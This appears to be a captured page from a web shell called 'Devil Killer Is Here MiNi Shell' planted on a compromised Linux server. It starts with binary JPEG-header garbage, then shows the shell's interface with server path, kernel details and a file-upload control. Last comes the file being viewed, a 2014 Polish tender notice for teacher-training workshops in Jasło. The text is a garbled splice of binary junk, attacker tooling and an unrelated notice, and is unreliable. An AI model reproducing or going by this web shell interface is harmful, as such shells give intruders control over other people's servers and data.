JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141017/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141017/221019-N-2014.html

<p class="kh_header"><b>Jasło: Realizacja form doskonalenia nauczycieli (szkolenia, warsztaty, wykłady, konsultacje grupowe i indywidualne) w ramach projektu pn. Bezpośrednie wsparcie rozwoju szkół poprzez wdrożenie zmodernizowanego systemu doskonalenia nauczycieli w Powiecie Jasielskim, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 221019 - 2014; data zamieszczenia: 17.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Ośrodek Edukacji Nauczycieli w Jaśle , ul. Sokoła 6, 38-200 Jasło, woj. podkarpackie, tel. 13 446 24 26, faks 13 446 24 26.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://poen.superhost.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizacja form doskonalenia nauczycieli (szkolenia, warsztaty, wykłady, konsultacje grupowe i indywidualne) w ramach projektu pn. Bezpośrednie wsparcie rozwoju szkół poprzez wdrożenie zmodernizowanego systemu doskonalenia nauczycieli w Powiecie Jasielskim, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest przygotowanie i przeprowadzenie serii szkoleń oraz przygotowanie materiałów szkoleniowych w ramach projektu pn. Bezpośrednie wsparcie rozwoju szkół poprzez wdrożenie zmodernizowanego systemu doskonalenia nauczycieli w Powiecie Jasielskim - realizowanego w ramach Programu Operacyjnego Kapitał Ludzki Działanie 3.5 Kompleksowe wspomaganie rozwoju szkół współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.
Celem projektu jest podniesienie jakości funkcjonowania systemu doskonalenia nauczycieli spójnego z potrzebami 57 szkół i 3 przedszkoli w Powiecie Jasielskim w okresie od 01.09.2013 r. do 31.08.2015 r.
2. Informacje ogólne: 
1) Przedmiotem zamówienia jest przeprowadzenie warsztatów, konsultacji grupowych dla około 790 nauczycieli i dyrektorów szkół - zrekrutowanych przez Zamawiającego, we wskazanym przez niego miejscu, tj. w szkołach na terenie Powiatu Jasielskiego.
2) Przedmiotem zamówienia objętych będzie 60 placówek (w tym 19 szkół podstawowych z Powiatu Jasielskiego, 26 gimnazjów z terenu Powiatu Jasielskiego, 6 Liceów Ogólnokształcących z terenu Powiatu Jasielskiego, 6 Techników z terenu Powiatu Jasielskiego oraz 3 przedszkola z terenu Powiatu Jasielskiego. 
3. Liczba godzin do przeprowadzenia wszelkich form szkoleń w roku szkolnym 2014/2015 wynosi ogółem 360 godzin warsztatów prowadzonych przez Eksperta w ramach RPW, 360 godzin konsultacji grupowych prowadzonych przez Eksperta w ramach RPW, 18 godzin warsztatów w ramach 6 sieci Współpracy i Samokształcenia.
1) Wykonawca powinien zabezpieczyć kompleksową realizację form doskonalenia nauczycieli na najwyższym poziomie merytorycznym w następujących ofertach doskonalenia, których założenia zostały wypracowane w ramach projektu System doskonalenia nauczycieli oparty na ogólnodostępnym kompleksowym wspomaganiu szkół
a) Oferta doskonalenia nr 1: Jak pomóc uczniowi osiągnąć sukces edukacyjny?;
b) Oferta doskonalenia nr 3: Techniki uczenia się i metody motywujące do nauki;
c) Oferta doskonalenia nr 4: Uczeń - aktywny uczestnik procesu uczenia się;
d) Oferta doskonalenia nr 5: Wykorzystanie EWD w ewaluacji wewnętrznej szkoły;
e) Oferta doskonalenia nr 6: Oferta edukacyjna drogą do właściwej realizacji podstawy programowej;
f) Oferta doskonalenia nr 7: Wspieranie pracy wychowawców klas - bezpieczna szkoła;
g) Oferta doskonalenia nr 8: Postawy uczniowskie. Jak je kształtować?;
h) Oferta doskonalenia nr 11: Praca z uczniem zdolnym;
i) Oferta doskonalenia nr 12: Praca z uczniem o specjalnych potrzebach edukacyjnych;
j) Oferta doskonalenia nr 13: Wykorzystanie TIK na zajęciach edukacyjnych - bezpieczny Internet;
k) Oferta doskonalenia nr 16: Rodzice są partnerami szkoły;
l) Oferta doskonalenia nr 17: Nauczyciel 45+;
m) Oferta doskonalenia nr 19: Doradztwo edukacyjno-zawodowe w szkole;
n) Oferta doskonalenia nr 20: Efektywna organizacja pracy zespołów nauczycielskich;
o) Oferta doskonalenia nr 22: Jak efektywnie wykorzystać wyposażenie i warunki lokalowe szkoły?;
p) Oferta doskonalenia nr 23: Jak i po co prowadzić ewaluację wewnętrzną?.
3) Realizacja form doskonalenia odbędzie się w ramach 6 sieci Współpracy i Samokształcenia:
- sieć współpracy i samokształcenia Promocja i budowanie wizerunku szkoły - warsztaty 1 x 3h;
- sieć współpracy i samokształcenia Jak rozwijać twórcze myślenie uczniów? - warsztaty 1 x 3h;
- sieć współpracy i samokształcenia Skuteczne sposoby zachęcania uczniów do czytania - warsztaty 1 x 3h;
- sieć współpracy i samokształcenia Pozapedagogiczne obowiązki dyrektora szkoły - warsztaty 1 x 3h;
- sieć współpracy i samokształcenia Praca ze źródłem historycznym - warsztaty 1 x 3h.
- sieć współpracy i samokształcenia Praca z uczniem młodszym - jak skutecznie i efektywnie pracować w grupie sześciolatków i siedmiolatków - warsztaty 1 x 3h.
4. Grupa warsztatowa może liczyć średnio 20-30 osób. Liczebność grupy uzależniona jest od liczby zatrudnionych nauczycieli w szkole/placówce.
5. W celu dostosowania się do warunków każdej szkoły/placówki termin i godziny spotkań Wykonawca uzgodni z Zamawiający oraz dyrektorem i Szkolnym Organizatorem Rozwoju Edukacji.
6. Po podpisaniu umowy Zamawiający ustali z Wykonawcą szczegółowy harmonogram szkoleń. Zamawiający wymaga, by szkolenia odbywały się zgodnie z opisem tematów i programów szkoleń dostarczonym przez Zamawiającego.
7. Szkolenia odbywać się będą głównie w godzinach popołudniowych w dniach od poniedziałki do piątku, natomiast w soboty albo dni wolne od pracy tj. ferie w godzinach dopołudniowych.
8. Zamawiający wymaga, by Wykonawca nie później niż na 7 dni przed rozpoczęciem każdego ze szkoleń opracował i przedstawił Zamawiającemu do akceptacji szczegółowy scenariusz szkoleń wraz z załącznikami np. materiałami szkoleniowymi wykorzystywanymi na potrzeby przeprowadzenia form doskonalenia nauczycieli.  
9. Koszty przejazdów i noclegów osób prowadzących wszelkie formy doskonalenia stanowiące przedmiot zamówienia pokrywa Wykonawca. 
10. Wykonawca zobowiązany jest do przekazywania Zamawiającemu dokumentów związanych z wykonaniem umowy: 
- harmonogramów szkoleń, 
- programu szkoleń i scenariuszy poszczególnych modułów,
- list obecności, 
- ankiet ewaluacyjnych,
- dokumentacji fotograficznej z przeprowadzonej formy doskonalenia (min. 3 szt. zdjęć o rozdzielczości 1024 x 768, zapisanych na płycie CD, DVD lub pamięci flash).  
11. Wykonawca zobowiązany jest do zachowania w tajemnicy wszelkich danych, do których będzie miała dostęp w związku z realizacją zamówienia.
12. Zamawiający zastrzega sobie prawo do obserwacji lub oceny jakości prowadzonych zajęć przez Wykonawcę. Obserwacji będą dokonywały osoby posiadające odpowiednie kwalifikacje i wyznaczone przez Zamawiającego. 
13. W przypadku stwierdzenia przez Zamawiającego, że Wykonawca nie spełnia wymagań organizacyjnych lub jakościowych związanych z realizacją szkoleń - Wykonawca zobowiązany będzie do natychmiastowej zmiany osoby prowadzącej zajęcia na osobę z równoważnymi kwalifikacjami i zaakceptowaną przez Zamawiającego.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwości udzielenia zamówień uzupełniających, stanowiących nie więcej niż 20% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>uprawnienia do wykonywania działalności związanej z doskonaleniem zawodowym nauczycieli stosownie do przepisów Rozporządzenia Ministra Edukacji Narodowej z dnia 19 listopada 2009 r. w sprawie placówek doskonalenia nauczycieli (Dz. U. nr 200, poz. 1537, ze zm.). Publiczna placówka doskonalenia nauczycieli musi posiadać akt założycielski, o którym mowa w § 2 ust. 1 ww. rozporządzenia. Niepubliczna placówka doskonalenia nauczycieli musi posiadać wpis do ewidencji prowadzonej przez samorząd województwa właściwy ze względu na siedzibę placówki doskonalenia zgodnie z § 24 ust. 1 ww. rozporządzenia. Ocena spełniania tego warunku odbędzie się na podstawie oświadczenia - załącznik nr 3</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert w niniejszym postępowaniu o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy  - w tym okresie zrealizował co najmniej 100 form doskonalenia nauczycieli (szkolenia, warsztaty, wykłady, konsultacje grupowe i indywidualne) z czego 50 form doskonalenia winno być powyżej 5 godzin dydaktycznych każde, potwierdzonych dowodami, że zostały wykonane  należycie. Ocena spełniania tego warunku odbędzie się na podstawie wykazu zrealizowanych usług - zał. nr 4 do SIWZ, (wraz z dowodami określającymi, że usługi te zostały wykonane w sposób należyty), oświadczenia - załącznik nr 3, oraz zobowiązania innych podmiotów - zał. nr 6 do SIWZ (jeżeli dotyczy)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku odbędzie się na podstawie oświadczenia - załącznik nr 3</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- W zakresie oferty doskonalenia nr 1 Jak pomóc uczniowi osiągnąć sukces edukacyjny?
4 ekspertami zdolnymi do wykonania zamówienia, z których każdy spełnia poniższe warunki, tj. posiada:
- wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym;
- przygotowanie do prowadzenia zajęć z zakresu specjalnych potrzeb edukacyjnych oraz dostosowania wymagań  edukacyjnych do możliwości psychofizycznych ucznia (pedagog, psycholog);
- przeprowadził co najmniej 2 szkolenia dla nauczycieli ( warsztaty, konsultacje grupowe) z zakresu diagnozowania możliwości i potrzeb rozwojowych ucznia oraz gotowości szkolnej, dostosowania metod i form pracy edukacyjnej do potrzeb indywidualnych ucznia, udzielania uczniom i rodzicom informacji o potrzebach i trudnościach w nauce. Umiejętność konstruowania narzędzi pomiaru dydaktycznego i analizy wyników pomiaru dydaktycznego i analizy wyników pomiaru dydaktycznego (z wykorzystaniem tablicy interaktywnej). 
- W zakresie oferty doskonalenia nr 3 Techniki uczenia się i metody motywujące do nauki.
3 ekspertami zdolnymi do wykonania zamówienia, z których każdy spełnia poniższe warunki, tj posiada:
- wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym;
- przygotowanie do prowadzenia zajęć  z zakresu technik uczenia się i zapamiętywania; 
- przeprowadził co najmniej 2 szkolenia dla nauczycieli (warsztaty, konsultacje grupowe) z wykorzystaniem dramy, technik szybkiego uczenia się i zapamiętywania. 
- W zakresie oferty doskonalenia nr 4 Uczeń - aktywny uczestnik procesu uczenia się.
1 ekspertem zdolnym do wykonania zamówienia, z których każdy spełnia poniższe warunki, tj posiada:
- wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym;
- przygotowanie do prowadzenia zajęć  w dziedzinie organizacji procesów edukacyjnych, specjalista w dziedzinie organizacji przestrzeni sprzyjającej uczeniu się; 
- przeprowadził co najmniej 2 szkolenia dla nauczycieli (warsztaty, konsultacje grupowe) z zakresu nowoczesnych metod pracy z uczniem zwiększających jego kreatywność w procesie edukacji, technik efektywnego uczenia się, motywowania ucznia do nauki.
- W zakresie oferty doskonalenia nr 5: Wykorzystanie EWD w ewaluacji wewnętrznej szkoły;
1 ekspertem zdolnym do wykonania zamówienia, który spełnia poniższe warunki, tj. posiada:
- wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym;
- przygotowanie do prowadzenia zajęć  z zakresu analizy i interpretacji EWD, wykorzystania  Kalkulatora  EWD, sposobów prezentowania wyników w nauce osiąganych przez uczniów, tworzenia procedur i narzędzi do planowania rozwoju szkoły; 
przeprowadził co najmniej 2 szkolenia dla nauczycieli (warsztaty, konsultacje grupowe) w obszarze o zbliżonym zakresie tematycznym.
- W zakresie oferty doskonalenia nr 6: Oferta edukacyjna drogą do właściwej realizacji podstawy programowej;
1 ekspertem zdolnym do wykonania zamówienia, który spełnia poniższe warunki, tj. posiada:
- wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym;
- specjalista w zakresie prawa oświatowego lub budowy autorskich programów nauczania; doradca metodyczny, konsultant  
- przeprowadził co najmniej 2 szkolenia dla nauczycieli (warsztaty, konsultacje grupowe) w obszarze o zbliżonym zakresie tematycznym
-  W zakresie oferty doskonalenia nr 7 Wspieranie pracy wychowawców klas - bezpieczna szkoła.
2 ekspertami osobami zdolnymi do wykonania zamówienia, z których każdy spełnia poniższe warunki, tj posiada:
- wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym;
- przygotowanie do prowadzenia zajęć  z zakresu wychowania oraz profilaktyki problemów dzieci i młodzieży  (psycholog, pedagog);
- przeprowadził co najmniej 2 szkolenia dla nauczycieli (warsztaty, konsultacje grupowe) dotyczących pomocy psychologiczno - pedagogicznej w szkole, realizacji działań wychowawczych ( agresja rówieśnicza, agresja rodziców wobec dzieci, nadpobudliwość ruchowa, niedostosowanie społeczne), planowania i organizacji pracy zespołowej, zarządzania emocjami.
- W zakresie oferty doskonalenia nr 8 Postawy uczniowskie. Jak je kształtować?
1 ekspertem zdolnym do wykonania zamówienia, który spełnia poniższe warunki, tj posiada:
- wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym, psycholog, pedagog;
- ma doświadczenie w prowadzeniu zajęć dotyczących wykorzystywania technologii informacyjno-komunikacyjnej w prowadzeniu szkoleń dot. działań edukacyjnych sprzyjających kształtowaniu pożądanych postaw uczniowskich, metod indywidualnego podejścia do ucznia, jego problemów nie tylko szkolnych, profilaktyki uzależnień, motywowania uczniów do zaangażowania w sprawy społeczne.
- W zakresie oferty doskonalenia nr 11 Praca z uczniem zdolnym.
2 ekspertami osobami zdolnymi do wykonania zamówienia, z których każdy spełnia poniższe warunki, tj. posiada:
- wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym;
- specjalista w dziedzinie diagnozowania uzdolnień, metodyk, psycholog rozwojowy, pedagog
- przeprowadził co najmniej 2 szkolenia dla nauczycieli (warsztaty, konsultacje grupowe)  dotyczące uwarunkowań optymalnej realizacji procesów edukacyjnych/umiejętności społecznych/motywowania/aktywizowania/kreatywności/współpracy i inicjatyw uczniowskich/metod i technik pracy z uczniami/stylów uczenia się
- W zakresie oferty doskonalenia nr 12 Praca z uczniem o specjalnych potrzebach edukacyjnych.
2 ekspertami osobami zdolnymi do wykonania zamówienia, z których każdy spełnia poniższe warunki, tj posiada:
- wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym;
- przygotowanie do  pracy eksperta lub specjalisty  o kwalifikacjach odpowiednich do potrzeb ucznia/uczniów, psycholog, pedagog specjalny; 
- przeprowadził co najmniej 2 szkolenia dla nauczycieli (warsztaty, konsultacje grupowe) dotyczących zasad pracy z uczniem o specjalnych potrzebach edukacyjnych, zespołowego planowania pracy, zakresu i sposobów dostosowania wymagań i metod pracy do możliwości ucznia ze specjalnymi potrzebami edukacyjnymi, opracowywania IPET-u;
- przeprowadził co najmniej 5 szkoleń dla nauczycieli (warsztaty, konsultacje grupowe) dotyczących sposobów i metod eliminowania agresji wśród uczniów oraz diagnozowania przyczyn niepowodzeń szkolnych.
- W zakresie oferty doskonalenia nr 13 Wykorzystanie TIK na zajęciach edukacyjnych - bezpieczny Internet.
1 ekspertem zdolnym do wykonania zamówienia, który spełnia poniższe warunki, tj posiada:
- wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym;
- przygotowanie do prowadzenia zajęć w dziedzinie wykorzystania nowoczesnych technologii w nauczaniu; 
- przeprowadził co najmniej 2 szkolenia dla nauczycieli (warsztaty, konsultacje grupowe) z zakresu wykorzystania środków i narzędzi TIK w przygotowaniu i prowadzeniu zajęć lekcyjnych, wykorzystania zasobów Internetu z uwzględnieniem praw autorskich, elementów komunikacji interpersonalnej w obrębie mediów elektronicznych, programów edukatorskich oraz materiałów multimedialnych w procesie edukacyjnym;
- przeprowadził co najmniej 2 szkolenia dla nauczycieli (warsztaty, konsultacje grupowe) w obszarze obsługi tablic interaktywnych wraz z oprogramowaniem, wykorzystanie narzędzia e-dziennik, wykorzystania Internetu i tablicy interaktywnej w pracy szkoły dotyczące przedmiotów zawodowych.
- W zakresie oferty doskonalenia nr 16 Rodzice są partnerami szkoły.
1 ekspertem zdolnym do wykonania zamówienia, który spełnia poniższe warunki, tj posiada:
- wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym;
- przygotowanie do prowadzenia zajęć dotyczących rozpoznawania postaw rodzica wobec szkoły, strategii postępowania wobec rodzica, negocjacji, sposobów motywowania rodziców do współpracy, przekazywania informacji zwrotnej, konstruowania narzędzi ewaluacji; 
- przeprowadził co najmniej 2 szkoleń dla nauczycieli dotyczących efektywności pracy wychowawczej szkoły, szkolnego systemu wartości,  współodpowiedzialności szkoły i rodziców za kształtowanie pożądanych postaw uczniów, udziału uczniów, rodziców i partnerów szkoły w budowaniu i realizacji programu wychowawczego; aspektów wychowania i tworzenia dokumentów wychowawczych szkoły.
- W zakresie oferty doskonalenia nr 17 Nauczyciel 45+ .
3 ekspertami osobami zdolnymi do wykonania zamówienia, z których każdy spełnia poniższe warunki, tj posiada:
- wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym;
- przygotowanie do prowadzenia zajęć dotyczących zarządzania emocjami, autoprezentacji, treningu asertywności, reagowania na prowokacje, zarządzanie czasem, emisji głosu, uregulowań prawnych dot. przejścia na emeryturę lub uzyskania świadczenia kompensacyjnego;
- przygotowanie do prowadzenia zajęć w dziedzinie nauczania obsługi programów komputerowych, psycholog, specjalista z zakresu radzenia sobie ze stresem, wypaleniem zawodowym;
- co najmniej 1 osoba posiadająca doświadczenie w zakresie prawa pracy i profilaktyki chorób zawodowych nauczycieli.
- W zakresie oferty doskonalenia nr 19 Doradztwo edukacyjno-zawodowe w szkole.
1 ekspertem zdolnym do wykonania zamówienia, których każdy spełnia poniższe warunki, tj. posiada:
- wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym;
- zna uregulowania prawne dot. odpowiedzialności szkoły za pomoc uczniowi w wyborze kierunku dalszego kształcenia prowadzenia rozmowy z uczniem w sposób wspomagający jego potencjał zmierzający do podjęcia decyzji edukacyjno - zawodowych, znajomości mechanizmów rynku pracy, metod i narzędzi wykorzystywanych w poradnictwie zawodowym w pracy z uczniem prowadzonej indywidualnie i grupowo.
- W zakresie oferty doskonalenia nr 20  Efektywna organizacja pracy zespołów nauczycielskich
1 ekspertem zdolnym do wykonania zamówienia, który spełnia poniższe warunki, tj.  posiada:
- wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym, psycholog
- specjalista w dziedzinie budowania zespołu, trener komunikacji interpersonalnej, socjolog
- przeprowadził co najmniej 2 szkolenia dla nauczycieli dotyczące różnych form motywowania klasy szkolnej jako grupy i ucznia do pracy, technik efektywnego uczenia się i nauczania, form oceniania i sprawdzania osiągnięć
- W zakresie oferty doskonalenia nr 21 Współpraca nauczycieli w prowadzeniu procesów edukacyjnych.
1 ekspertem zdolnym do wykonania zamówienia, który spełnia poniższe warunki,, tj. posiada:
- wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym;
- przygotowanie do prowadzenia zajęć  dot. rozwijania kompetencji w zakresie dobrych praktyk w komunikacji interpersonalnej oraz umiejętności metodycznych w zakresie skutecznej organizacji procesów edukacyjnych, zespołów nauczycielskich (tworzenia, określenia ról członków zespołu, monitorowania pracy);
- przeprowadził co najmniej 2 szkolenia dla nauczycieli dotyczących uwarunkowań optymalnej realizacji procesów edukacyjnych, umiejętności społecznych, motywowania, aktywizowania, kreatywności współpracy i inicjatyw uczniowskich, metod i technik pracy z uczniami, stylów uczenia się.
- W zakresie oferty doskonalenia nr 22 Jak efektywnie wykorzystać wyposażenie i warunki lokalowe szkoły?
1 ekspertem zdolnym do wykonania zamówienia, który spełnia poniższe warunki, posiada:
- wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym,
- specjalista w dziedzinie aranżacji przestrzeni edukacyjnej, pozyskiwania środków, budowania relacji negocjowania 
- przeprowadził co najmniej 2 szkolenia dla nauczycieli dotyczące strategii motywowania uczniów zdolnych i mających trudności w nauce, form i sposobów promowania szkoły w środowisku lokalnym
- W zakresie oferty doskonalenia nr 23 Jak i po co prowadzić ewaluację wewnętrzną?
1 ekspertem zdolnym do wykonania zamówienia, który spełnia poniższe warunki, tj posiada:
- wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym;
- przygotowanie do prowadzenia zajęć w zakresie prowadzenia ewaluacji w oświacie; 
- przeprowadził co najmniej 2 szkolenia dla nauczycieli w zakresie sposobów bania  pracy szkoły, opracowywania narzędzi badawczych, analizy zebranych danych, opracowania raportu, formułowania wniosków i rekomendacji, posiada wiedzę w zakresie metodologii badań oraz wymagań zawartych w dokumentach MEN w kontekście rozwoju szkoły.
- W zakresie sieci współpracy i samokształcenia:
1 ekspertem zdolnym do wykonania zamówienia, który spełnia poniższe warunki, tj posiada:
- ukończone kursy/szkolenia/studia podyplomowe odpowiadające zakresowi tematycznemu pracy sieci ( oferta ORE)
- sieć współpracy i samokształcenia Promocja i budowanie wizerunku szkoły 
- sieć współpracy i samokształcenia Jak rozwijać twórcze myślenie uczniów?
- sieć współpracy i samokształcenia Skuteczne sposoby zachęcania uczniów do czytania
- sieć współpracy i samokształcenia Pozapedagogiczne obowiązki dyrektora szkoły
- sieć współpracy i samokształcenia Praca ze źródłem historycznym
